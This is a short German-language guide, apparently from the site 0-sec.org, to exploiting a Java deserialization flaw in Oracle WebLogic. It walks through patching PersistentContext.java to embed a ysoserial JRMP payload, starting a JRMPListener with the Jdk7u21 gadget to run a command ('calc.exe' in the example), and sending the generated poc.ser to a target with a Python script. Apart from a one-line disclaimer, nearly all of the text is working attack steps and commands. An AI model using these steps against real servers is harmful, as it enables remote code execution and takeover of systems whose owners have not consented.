
0-sec.org
Nur für Lern- und Austauschzwecke. Für andere Verwendungen übernimmt der Benutzer die volle Verantwortung.
Die relevanten JAR-Dateien wurden bereits in das Projekt importiert, und die Ausnutzungsmethode verwendet yso's JRMP. Beim Lern- und Debuggingprozess kann die Ausnutzungsmethode geändert werden.
Zuerst muss die Datei SerializedSystemIni.dat aus dem WebLogic-Verzeichnis in den security-Ordner gelegt werden.
Dann muss yso in ysoserial.jar umbenannt und in das lib-Verzeichnis importiert werden.

Als nächstes müssen die IP-Adresse und der Port in getObject aus weblogic/wsee/jaxws/persistence/PersistentContext.java eingetragen werden.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
Schließlich wird die Ausführung des 7u21-Befehls über JRMP-Fernüberwachung durchgeführt.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
Verwendungsmethode: Führen Sie Poc.java aus, um die Serialisierungsdatei poc.ser zu generieren. Verwenden Sie dann:
python weblogic.py ip port poc.ser

